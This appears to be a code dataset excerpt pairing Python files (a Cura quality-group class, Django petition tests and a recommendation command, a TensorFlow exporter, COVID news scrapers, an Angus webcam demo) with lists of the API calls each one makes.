code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
# Copyright (c) 2018 Ultim<NAME>.V.
# Cura is released under the terms of the LGPLv3 or higher.
from typing import Dict, Optional, List
from PyQt5.QtCore import QObject, pyqtSlot
#
# A QualityGroup represents a group of containers that must be applied to each ContainerStack when it's used.
# Some concrete examples are Quality and QualityChanges: when we select quality type "normal", this quality type
# must be applied to all stacks in a machine, although each stack can have different containers. Use an Ultimaker 3
# as an example, suppose we choose quality type "normal", the actual InstanceContainers on each stack may look
# as below:
# GlobalStack ExtruderStack 1 ExtruderStack 2
# quality container: um3_global_normal um3_aa04_pla_normal um3_aa04_abs_normal
#
# This QualityGroup is mainly used in quality and quality_changes to group the containers that can be applied to
# a machine, so when a quality/custom quality is selected, the container can be directly applied to each stack instead
# of looking them up again.
#
class QualityGroup(QObject):
def __init__(self, name: str, quality_type: str, parent = None):
super().__init__(parent)
self.name = name
self.node_for_global = None # type: Optional["QualityGroup"]
self.nodes_for_extruders = {} # type: Dict[int, "QualityGroup"]
self.quality_type = quality_type
self.is_available = False
@pyqtSlot(result = str)
def getName(self) -> str:
return self.name
def getAllKeys(self) -> set:
result = set()
for node in [self.node_for_global] + list(self.nodes_for_extruders.values()):
if node is None:
continue
result.update(node.getContainer().getAllKeys())
return result
def getAllNodes(self) -> List["QualityGroup"]:
result = []
if self.node_for_global is not None:
result.append(self.node_for_global)
for extruder_node in self.nodes_for_extruders.values():
result.append(extruder_node)
return result
|
[
"PyQt5.QtCore.pyqtSlot"
] |
[((1464, 1484), 'PyQt5.QtCore.pyqtSlot', 'pyqtSlot', ([], {'result': 'str'}), '(result=str)\n', (1472, 1484), False, 'from PyQt5.QtCore import QObject, pyqtSlot\n')]
|
from django.core.management import BaseCommand
from django.contrib.auth import get_user_model
from django.db.models import Prefetch, Q
from user.models import Recommender, Friendship, Recommendation
from user.recommendations.saver import RecommendationSaver
class Command(BaseCommand):
help = 'Generate recommendations for users'
def handle(self, *args, **kwargs):
# load users
users = get_user_model().objects.prefetch_related(
'automatic_classification',
'manual_classification',
'locations',
Prefetch('friends_set', queryset=Friendship.objects.filter(lunch_together=True)),
).all()
saver = RecommendationSaver()
generators = Recommender.objects.order_by('order').all()
for generator in generators:
for user in users:
print(user.email)
saver.save_recommendations(generator, user)
|
[
"user.models.Recommender.objects.order_by",
"user.recommendations.saver.RecommendationSaver",
"django.contrib.auth.get_user_model",
"user.models.Friendship.objects.filter"
] |
[((686, 707), 'user.recommendations.saver.RecommendationSaver', 'RecommendationSaver', ([], {}), '()\n', (705, 707), False, 'from user.recommendations.saver import RecommendationSaver\n'), ((729, 766), 'user.models.Recommender.objects.order_by', 'Recommender.objects.order_by', (['"""order"""'], {}), "('order')\n", (757, 766), False, 'from user.models import Recommender, Friendship, Recommendation\n'), ((414, 430), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (428, 430), False, 'from django.contrib.auth import get_user_model\n'), ((604, 650), 'user.models.Friendship.objects.filter', 'Friendship.objects.filter', ([], {'lunch_together': '(True)'}), '(lunch_together=True)\n', (629, 650), False, 'from user.models import Recommender, Friendship, Recommendation\n')]
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exporters for tf.estimator training."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
from language.common.utils import file_utils
import tensorflow as tf
class BestSavedModelAndCheckpointExporter(tf.estimator.BestExporter):
"""Exporter that saves the best SavedModel and checkpoint."""
def __init__(self,
eval_spec_name,
serving_input_receiver_fn,
compare_fn=None,
metric_name=None,
higher_is_better=True):
"""Creates an exporter that compares models on the given eval and metric.
While the SavedModel is useful for inference, the checkpoint is useful for
warm-starting another stage of training (e.g., fine-tuning).
Args:
eval_spec_name: Name of the EvalSpec to use to compare models.
serving_input_receiver_fn: Callable that returns a ServingInputReceiver.
compare_fn: Callable that compares eval metrics of two models. See
tf.estimator.BestExporter for details on the expected API. Specify
either this or `metric_name`.
metric_name: Name of the eval metric to use to compare models. Specify
either this or `compare_fn`.
higher_is_better: Whether higher or lower eval metric values are better.
Only used when `metric_name` is specified.
"""
self._metric_name = metric_name
def _default_compare_fn(best_eval_result, current_eval_result):
"""Returns True if the current metric is better than the best metric."""
if higher_is_better:
return current_eval_result[metric_name] > best_eval_result[metric_name]
else:
return current_eval_result[metric_name] < best_eval_result[metric_name]
super(BestSavedModelAndCheckpointExporter, self).__init__(
name="best_%s" % eval_spec_name,
serving_input_receiver_fn=serving_input_receiver_fn,
event_file_pattern="eval_%s/*.tfevents.*" % eval_spec_name,
compare_fn=compare_fn or _default_compare_fn)
def export(self, estimator, export_path, checkpoint_path, eval_result,
is_the_final_export):
"""Implements Exporter.export()."""
# Since export() returns None if export was skipped, we can use this to
# detect when the current model is the new best model.
exported_dir = super(BestSavedModelAndCheckpointExporter, self).export(
estimator=estimator,
export_path=export_path,
checkpoint_path=checkpoint_path,
eval_result=eval_result,
is_the_final_export=is_the_final_export)
if exported_dir is None:
return None # best model unchanged
checkpoint_dir = os.path.join(export_path, "checkpoint")
tf.logging.info("Saving new best checkpoint to %s", checkpoint_dir)
file_utils.make_empty_dir(checkpoint_dir)
file_utils.copy_files_to_dir(
source_filepattern=checkpoint_path + ".*", dest_dir=checkpoint_dir)
# Also save the new best metrics.
all_metrics = "".join(
" %r: %r,\n" % (name, metric)
for name, metric in sorted(self._best_eval_result.items()))
file_utils.set_file_contents(
data="{\n" + all_metrics + "}\n",
path=os.path.join(export_path, "all_metrics.txt"))
file_utils.set_file_contents(
data="%d %r\n" % (self._best_eval_result["global_step"],
self._best_eval_result[self._metric_name]),
path=os.path.join(export_path, "best_metric.txt"))
file_utils.set_file_contents(
data=exported_dir + "\n",
path=os.path.join(export_path, "best_saved_model.txt"))
return exported_dir
|
[
"language.common.utils.file_utils.copy_files_to_dir",
"tensorflow.logging.info",
"language.common.utils.file_utils.make_empty_dir"
] |
[((3365, 3432), 'tensorflow.logging.info', 'tf.logging.info', (['"""Saving new best checkpoint to %s"""', 'checkpoint_dir'], {}), "('Saving new best checkpoint to %s', checkpoint_dir)\n", (3380, 3432), True, 'import tensorflow as tf\n'), ((3437, 3478), 'language.common.utils.file_utils.make_empty_dir', 'file_utils.make_empty_dir', (['checkpoint_dir'], {}), '(checkpoint_dir)\n', (3462, 3478), False, 'from language.common.utils import file_utils\n'), ((3483, 3583), 'language.common.utils.file_utils.copy_files_to_dir', 'file_utils.copy_files_to_dir', ([], {'source_filepattern': "(checkpoint_path + '.*')", 'dest_dir': 'checkpoint_dir'}), "(source_filepattern=checkpoint_path + '.*',\n dest_dir=checkpoint_dir)\n", (3511, 3583), False, 'from language.common.utils import file_utils\n')]
|
import unittest
from distutils.version import StrictVersion
from mopidy import __version__
class VersionTest(unittest.TestCase):
def test_current_version_is_parsable_as_a_strict_version_number(self):
StrictVersion(__version__)
|
[
"distutils.version.StrictVersion"
] |
[((215, 241), 'distutils.version.StrictVersion', 'StrictVersion', (['__version__'], {}), '(__version__)\n', (228, 241), False, 'from distutils.version import StrictVersion\n')]
|
"""
Author: <NAME> (@zujko)
Author: <NAME> (@chrislemelin)
Description: Tests for petition operations.
Date Created: Sept 15 2016
Updated: Feb 17 2017
"""
from datetime import timedelta
from django.contrib.auth.models import User
from django.test import Client, TestCase
from django.test.client import RequestFactory
from django.utils import timezone
from petitions.models import Petition, Response, Tag, Update
from .consumers import serialize_petitions
from .views import (PETITION_DEFAULT_BODY, PETITION_DEFAULT_TITLE, edit_check,
get_petition, petition_edit, petition_sign)
class PetitionTest(TestCase):
def setUp(self):
self.client = Client()
self.factory = RequestFactory()
self.superUser = User.objects.create_user(
username='txu1267', email='txu1267', is_staff=True)
self.superUser.set_password('<PASSWORD>')
self.superUser.save()
self.superUser2 = User.objects.create_user(
username='txu1266', email='txu1266', is_superuser=True)
self.superUser2.set_password('<PASSWORD>')
self.superUser2.save()
self.user = User.objects.create_user(
username='axu7254', email='axu7254')
self.user2 = User.objects.create_user(
username='cxl1234', email='cxl1234')
self.user3 = User.objects.create_user(
username='abc4321', email='abc4321')
self.tag = Tag(name='Test')
self.tag.save()
self.petition = Petition(title='Test petition',
description='This is a test petition',
author=self.user,
created_at=timezone.now(),
status=0,
expires=timezone.now() + timedelta(days=30)
)
self.petition.save()
self.petition.tags.add(self.tag)
self.petitionPublished = Petition(title='Test petition Published',
description='This is a test petition Published',
author=self.user2,
created_at=timezone.now(),
status=1,
expires=timezone.now() + timedelta(days=30)
)
self.petitionPublished.save()
def test_about_page(self):
response = self.client.get('/about/')
assert response.status_code == 200
self.assertTemplateUsed(response, 'about.html')
def test_maintenance_page(self):
response = self.client.get('/maintenance/')
assert response.status_code == 200
self.assertTemplateUsed(response, 'Something_Special.html')
def test_index_page(self):
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'index.html')
def test_404(self):
response = self.client.get('/doesnotexist')
self.assertEqual(response.status_code, 404)
self.assertTemplateUsed(response, '404.html')
def test_petition_edit(self):
self.client.force_login(self.superUser)
# Change petition title to 'New'
obj = {
"attribute": "title",
"value": "New"
}
response = self.client.post(
'/petition/update/' + str(self.petition.id), obj)
# Check that it doesn't 404
self.assertNotEqual(response.status_code, 404)
# Check that petition was actually changed
pet = Petition.objects.get(pk=self.petition.id)
self.assertEqual(pet.title, 'New')
def test_petition_publish(self):
self.client.force_login(self.user)
tag = Tag(name='test tag')
tag.save()
obj = {
"attribute": "publish",
"value": "foo"
}
self.petition.status = 0
self.petition.tags.add(tag)
self.petition.save()
request = self.factory.post(
'/petition/update/' + str(self.petition.id), obj)
request.META['HTTP_HOST'] = 'localhost'
request.user = self.user
response = petition_edit(request, self.petition.id)
# Make sure there is no 404
self.assertNotEqual(response.status_code, 404)
# Check that petition was published
pet = Petition.objects.get(pk=self.petition.id)
self.assertEqual(pet.status, 1)
def test_sign_petition(self):
self.client.force_login(self.superUser)
response = self.client.post(
'/petition/sign/' + str(self.petitionPublished.id), {'test': 'test'})
pet = Petition.objects.get(pk=self.petitionPublished.id)
self.assertEqual(pet.signatures, 1)
self.assertEqual(response.status_code, 200)
def test_petition_subscribe(self):
self.client.force_login(self.user)
user = User.objects.get(pk=self.user.id)
self.assertEqual(user.profile.subscriptions.filter(
pk=self.petition.id).exists(), False)
response = self.client.post(
'/petition/subscribe/' + str(self.petition.id), {})
user = User.objects.get(pk=self.user.id)
self.assertEqual(user.profile.subscriptions.filter(
pk=self.petition.id).exists(), True)
def test_petition_unsubscribe(self):
self.client.force_login(self.user)
user = User.objects.get(pk=self.user.id)
self.assertEqual(user.profile.subscriptions.filter(
pk=self.petition.id).exists(), False)
response = self.client.post(
'/petition/subscribe/' + str(self.petition.id), {})
user = User.objects.get(pk=self.user.id)
self.assertEqual(user.profile.subscriptions.filter(
pk=self.petition.id).exists(), True)
response = self.client.post(
'/petition/unsubscribe/' + str(self.petition.id), {})
user = User.objects.get(pk=self.user.id)
self.assertEqual(user.profile.subscriptions.filter(
pk=self.petition.id).exists(), False)
def test_petition_unpublish(self):
self.client.force_login(self.superUser)
response = self.client.post(
'/petition/unpublish/' + str(self.petition.id))
self.assertEqual(response.status_code, 200)
pet = Petition.objects.get(pk=self.petition.id)
self.assertEqual(pet.status, 2)
# Test using not super user
self.client.force_login(self.user)
pet.status = 1
pet.save()
response = self.client.post(
'/petition/unpublish/' + str(self.petition.id))
pet = Petition.objects.get(pk=self.petition.id)
self.assertEqual(pet.status, 1)
def test_petition_page(self):
response = self.client.get('/petition/' + str(self.petition.id))
self.assertEqual(response.status_code, 200)
def test_url_redirect_fail(self):
self.client.force_login(self.user)
response = self.client.get('/petition/' + str(666))
self.assertEqual(response.status_code, 404)
def test_create_petition(self):
self.client.force_login(self.user)
response = self.client.post('/petition/create/')
self.assertEqual(response.status_code, 200)
userobj = User.objects.get(pk=self.user.id)
self.assertEqual(userobj.profile.petitions_signed.all()[
0].title, PETITION_DEFAULT_TITLE)
def test_check_edit(self):
self.client.force_login(self.user)
self.assertEqual(edit_check(self.user, self.petition), True)
self.assertEqual(edit_check(self.superUser, self.petition), True)
self.assertEqual(edit_check(self.superUser2, self.petition), False)
self.assertEqual(edit_check(self.user2, self.petition), False)
def test_serialize_petitions(self):
petitions = Petition.objects.all()
json_response = serialize_petitions(petitions)
# TODO: Improve this test to be more thorough
self.assertNotEqual(json_response, None)
def test_url_redirect(self):
self.client.force_login(self.user)
response = self.client.get('/petitions/' + str(self.petition.id))
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, '/?p='+str(self.petition.id),
status_code=302, target_status_code=200)
def test_edit_petition_description(self):
self.client.force_login(self.superUser)
obj = {
"attribute": "description",
"value": "test test test"
}
response = self.client.post(
'/petition/update/' + str(self.petition.id), obj)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petition.id)
self.assertEqual(pet.description, "test test test")
def test_petition_add_tag(self):
self.client.force_login(self.superUser)
tag = Tag(name='test tag2')
tag.save()
obj = {
"attribute": "add-tag",
"value": tag.id
}
response = self.client.post(
'/petition/update/' + str(self.petition.id), obj)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petition.id)
if tag not in pet.tags.all():
self.fail("tag not added")
def test_petition_remove_tag(self):
self.client.force_login(self.superUser)
tag = Tag(name='test tag2')
tag.save()
self.petition.tags.add(tag)
self.petition.save()
obj = {
"attribute": "remove-tag",
"value": tag.id
}
response = self.client.post(
'/petition/update/' + str(self.petition.id), obj)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petition.id)
if tag in pet.tags.all():
self.fail("tag not removed")
def test_petition_add_update(self):
self.client.force_login(self.superUser)
obj = {
"attribute": "add_update",
"value": "test update"
}
request = self.factory.post(
'/petition/update/' + str(self.petition.id), obj)
request.user = self.superUser
request.META['HTTP_HOST'] = "random"
response = petition_edit(request, self.petition.id)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petition.id)
fail = True
for update in pet.updates.all():
value = update.description
if value == "test update":
fail = False
if fail:
self.fail("did not add update")
def test_petition_add_response(self):
self.client.force_login(self.superUser)
obj = {
"attribute": "response",
"value": "test response"
}
request = self.factory.post(
'/petition/update/' + str(self.petition.id), obj)
request.user = self.superUser
request.META['HTTP_HOST'] = "random"
response = petition_edit(request, self.petition.id)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petition.id)
if pet.response.description != "test response":
self.fail()
def test_petition_mark_work_in_progress(self):
self.client.force_login(self.superUser)
obj = {
"attribute": "mark-in-progress"
}
self.assertEqual(self.petitionPublished.in_progress, None)
response = self.client.post(
'/petition/update/' + str(self.petitionPublished.id), obj)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petitionPublished.id)
self.assertEqual(pet.in_progress, True)
def test_petition_unpublish_progress(self):
self.client.force_login(self.superUser)
obj = {
"attribute": "unpublish"
}
self.assertEqual(self.petitionPublished.status, 1)
request = self.factory.post(
'/petition/update/' + str(self.petitionPublished.id), obj)
request.user = self.superUser
request.META['HTTP_HOST'] = "random"
response = petition_edit(request, self.petitionPublished.id)
self.assertNotEqual(response.status_code, 404)
pet = Petition.objects.get(pk=self.petitionPublished.id)
self.assertEqual(pet.status, 2)
def test_get_petition(self):
self.client.force_login(self.superUser)
petition = get_petition(self.petition.id, self.user)
self.assertEqual(petition, self.petition)
def test_get_petition_fail(self):
self.client.force_login(self.superUser)
petition = get_petition(self.petition.id, self.user2)
self.assertEqual(petition, False)
def test_petition_str(self):
assert str(self.petition) == self.petition.title
def test_tag_str(self):
assert str(self.tag) == self.tag.name
def test_response_str(self):
resp = Response.objects.create(
description='Response', created_at=timezone.now(), author='Test Author')
assert str(resp) == 'Test Author'
|
[
"django.contrib.auth.models.User.objects.get",
"django.test.Client",
"petitions.models.Tag",
"django.utils.timezone.now",
"petitions.models.Petition.objects.get",
"django.contrib.auth.models.User.objects.create_user",
"django.test.client.RequestFactory",
"datetime.timedelta",
"petitions.models.Petition.objects.all"
] |
[((676, 684), 'django.test.Client', 'Client', ([], {}), '()\n', (682, 684), False, 'from django.test import Client, TestCase\n'), ((708, 724), 'django.test.client.RequestFactory', 'RequestFactory', ([], {}), '()\n', (722, 724), False, 'from django.test.client import RequestFactory\n'), ((750, 826), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""txu1267"""', 'email': '"""txu1267"""', 'is_staff': '(True)'}), "(username='txu1267', email='txu1267', is_staff=True)\n", (774, 826), False, 'from django.contrib.auth.models import User\n'), ((946, 1031), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""txu1266"""', 'email': '"""txu1266"""', 'is_superuser': '(True)'}), "(username='txu1266', email='txu1266', is_superuser=True\n )\n", (970, 1031), False, 'from django.contrib.auth.models import User\n'), ((1142, 1203), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""axu7254"""', 'email': '"""axu7254"""'}), "(username='axu7254', email='axu7254')\n", (1166, 1203), False, 'from django.contrib.auth.models import User\n'), ((1238, 1299), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""cxl1234"""', 'email': '"""cxl1234"""'}), "(username='cxl1234', email='cxl1234')\n", (1262, 1299), False, 'from django.contrib.auth.models import User\n'), ((1334, 1395), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""abc4321"""', 'email': '"""abc4321"""'}), "(username='abc4321', email='abc4321')\n", (1358, 1395), False, 'from django.contrib.auth.models import User\n'), ((1428, 1444), 'petitions.models.Tag', 'Tag', ([], {'name': '"""Test"""'}), "(name='Test')\n", (1431, 1444), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((3656, 3697), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (3676, 3697), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((3836, 3856), 'petitions.models.Tag', 'Tag', ([], {'name': '"""test tag"""'}), "(name='test tag')\n", (3839, 3856), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((4452, 4493), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (4472, 4493), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((4750, 4800), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petitionPublished.id'}), '(pk=self.petitionPublished.id)\n', (4770, 4800), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((4995, 5028), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'pk': 'self.user.id'}), '(pk=self.user.id)\n', (5011, 5028), False, 'from django.contrib.auth.models import User\n'), ((5255, 5288), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'pk': 'self.user.id'}), '(pk=self.user.id)\n', (5271, 5288), False, 'from django.contrib.auth.models import User\n'), ((5499, 5532), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'pk': 'self.user.id'}), '(pk=self.user.id)\n', (5515, 5532), False, 'from django.contrib.auth.models import User\n'), ((5759, 5792), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'pk': 'self.user.id'}), '(pk=self.user.id)\n', (5775, 5792), False, 'from django.contrib.auth.models import User\n'), ((6022, 6055), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'pk': 'self.user.id'}), '(pk=self.user.id)\n', (6038, 6055), False, 'from django.contrib.auth.models import User\n'), ((6418, 6459), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (6438, 6459), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((6733, 6774), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (6753, 6774), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((7376, 7409), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'pk': 'self.user.id'}), '(pk=self.user.id)\n', (7392, 7409), False, 'from django.contrib.auth.models import User\n'), ((7960, 7982), 'petitions.models.Petition.objects.all', 'Petition.objects.all', ([], {}), '()\n', (7980, 7982), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((8851, 8892), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (8871, 8892), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((9053, 9074), 'petitions.models.Tag', 'Tag', ([], {'name': '"""test tag2"""'}), "(name='test tag2')\n", (9056, 9074), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((9354, 9395), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (9374, 9395), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((9576, 9597), 'petitions.models.Tag', 'Tag', ([], {'name': '"""test tag2"""'}), "(name='test tag2')\n", (9579, 9597), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((9945, 9986), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (9965, 9986), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((10564, 10605), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (10584, 10605), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((11340, 11381), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petition.id'}), '(pk=self.petition.id)\n', (11360, 11381), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((11879, 11929), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petitionPublished.id'}), '(pk=self.petitionPublished.id)\n', (11899, 11929), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((12527, 12577), 'petitions.models.Petition.objects.get', 'Petition.objects.get', ([], {'pk': 'self.petitionPublished.id'}), '(pk=self.petitionPublished.id)\n', (12547, 12577), False, 'from petitions.models import Petition, Response, Tag, Update\n'), ((1692, 1706), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1704, 1706), False, 'from django.utils import timezone\n'), ((2213, 2227), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (2225, 2227), False, 'from django.utils import timezone\n'), ((13289, 13303), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (13301, 13303), False, 'from django.utils import timezone\n'), ((1792, 1806), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1804, 1806), False, 'from django.utils import timezone\n'), ((1809, 1827), 'datetime.timedelta', 'timedelta', ([], {'days': '(30)'}), '(days=30)\n', (1818, 1827), False, 'from datetime import timedelta\n'), ((2331, 2345), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (2343, 2345), False, 'from django.utils import timezone\n'), ((2348, 2366), 'datetime.timedelta', 'timedelta', ([], {'days': '(30)'}), '(days=30)\n', (2357, 2366), False, 'from datetime import timedelta\n')]
|
# -*- coding:utf-8 -*-
# /usr/bin/env python
"""
Author: <NAME>
date: 2020/1/23 9:07
contact: <EMAIL>
desc: 新增-事件接口
新增-事件接口新型冠状病毒-网易
新增-事件接口新型冠状病毒-丁香园
"""
import json
import time
import requests
import pandas as pd
from bs4 import BeautifulSoup
def epidemic_163():
url = "https://news.163.com/special/epidemic/?spssid=93326430940df93a37229666dfbc4b96&spsw=4&spss=other&"
res = requests.get(url)
soup = BeautifulSoup(res.text, "lxml")
province_list = [item.get_text() for item in soup.find("ul").find_all("strong")]
desc_list = [item.get_text() for item in soup.find("ul").find_all("li")]
temp_df = pd.DataFrame([province_list, desc_list],
index=["地区", f"数据-{soup.find(attrs={'class': 'tit'}).find('span').get_text()}"]).T
return temp_df
def epidemic_dxy(indicator="data"):
url = "https://3g.dxy.cn/newh5/view/pneumonia"
params = {
"scene": "2",
"clicktime": int(time.time()),
"enterid": int(time.time()),
"from": "groupmessage",
"isappinstalled": "0",
}
res = requests.get(url, params=params)
res.encoding = "utf-8"
soup = BeautifulSoup(res.text, "lxml")
text_data_news = str(soup.find_all("script", attrs={"id": "getTimelineService"}))
temp_json = text_data_news[text_data_news.find("= {") + 2: text_data_news.rfind("}catch")]
json_data = pd.DataFrame(json.loads(temp_json)["result"])
desc_data = json_data[["title", "summary", "infoSource", "provinceName", "sourceUrl"]]
text_data_news = str(soup.find_all("script", attrs={"id": "getListByCountryTypeService1"}))
temp_json = text_data_news[text_data_news.find("= [{") + 2: text_data_news.rfind("catch") - 1]
json_data = pd.DataFrame(json.loads(temp_json))
data = json_data[['tags', 'provinceShortName']]
dig_data = data[['provinceShortName', 'tags']]
# text_data_news = str(soup.find_all("script")[6])
# temp_json = text_data_news[text_data_news.find("= {") + 2: text_data_news.rfind("}catch")]
# info_data = pd.DataFrame(json.loads(temp_json), index=[0]).T
if indicator == "data":
return dig_data
else:
return desc_data
if __name__ == '__main__':
epidemic_dxy_df = epidemic_dxy(indicator="data")
print(epidemic_dxy_df)
epidemic_163_df = epidemic_163()
print(epidemic_163_df)
|
[
"bs4.BeautifulSoup",
"json.loads",
"requests.get",
"time.time"
] |
[((388, 405), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (400, 405), False, 'import requests\n'), ((417, 448), 'bs4.BeautifulSoup', 'BeautifulSoup', (['res.text', '"""lxml"""'], {}), "(res.text, 'lxml')\n", (430, 448), False, 'from bs4 import BeautifulSoup\n'), ((1077, 1109), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (1089, 1109), False, 'import requests\n'), ((1148, 1179), 'bs4.BeautifulSoup', 'BeautifulSoup', (['res.text', '"""lxml"""'], {}), "(res.text, 'lxml')\n", (1161, 1179), False, 'from bs4 import BeautifulSoup\n'), ((1739, 1760), 'json.loads', 'json.loads', (['temp_json'], {}), '(temp_json)\n', (1749, 1760), False, 'import json\n'), ((947, 958), 'time.time', 'time.time', ([], {}), '()\n', (956, 958), False, 'import time\n'), ((984, 995), 'time.time', 'time.time', ([], {}), '()\n', (993, 995), False, 'import time\n'), ((1390, 1411), 'json.loads', 'json.loads', (['temp_json'], {}), '(temp_json)\n', (1400, 1411), False, 'import json\n')]
|
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import cv2
import numpy as np
import StringIO
import datetime
import pytz
import angus
import angus_display as ad
import stats as st
def f(stream_index, width, height):
camera = cv2.VideoCapture(stream_index)
camera.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, int(width))
camera.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, int(height))
camera.set(cv2.cv.CV_CAP_PROP_FPS, 10)
if not camera.isOpened():
print("Cannot open stream of index {}".format(stream_index))
exit(1)
print("Video stream is of resolution {} x {}".format(camera.get(3), camera.get(4)))
stats = st.Stats("stats.json")
animation = []
engaged = []
conn = angus.connect()
service = conn.services.get_service("scene_analysis", version=1)
service.enable_session()
while camera.isOpened():
ret, frame = camera.read()
if not ret:
break
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
ret, buff = cv2.imencode(".jpg", gray, [cv2.IMWRITE_JPEG_QUALITY, 80])
buff = StringIO.StringIO(np.array(buff).tostring())
t = datetime.datetime.now(pytz.utc)
job = service.process({"image": buff,
"timestamp" : t.isoformat(),
"camera_position": "facing",
"sensitivity": {
"appearance": 0.7,
"disappearance": 0.7,
"age_estimated": 0.4,
"gender_estimated": 0.5,
"focus_locked": 0.9,
"emotion_detected": 0.4,
"direction_estimated": 0.8
}
})
res = job.result
events = res["events"]
entities = res["entities"]
for idx, h in entities.iteritems():
pt = ad.displayAge(frame, idx, h, 0.50, 0.35)
ch = ad.displayHair(frame, idx, h)
ad.displayAvatar(frame, h, pt, ch)
ad.displayEmotion(frame, h, pt)
ad.displayGender(frame, h, pt)
ad.displayGaze(frame, idx, h, pt, 0.50)
panel = ((width - 180, 40), (width-20, height - 40))
ad.blur(frame, panel[0], panel[1], (255, 255, 255), 2)
ad.computeConversion(res, events, entities, engaged, stats, animation, 0.5, 500)
ad.displayConversion(frame, stats, (width - 100, int(0.3*height)))
ad.displayAnimation(frame, animation)
ad.display_logo(frame, 20, height - 60)
cv2.imshow('window', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
stats.save()
break
service.disable_session()
camera.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
### Web cam index might be different from 0 on your setup.
### To grab a given video file instead of the host computer cam, try:
### main("/path/to/myvideo.avi")
f(0, 640, 480)
|
[
"angus_display.blur",
"angus_display.displayHair",
"cv2.imencode",
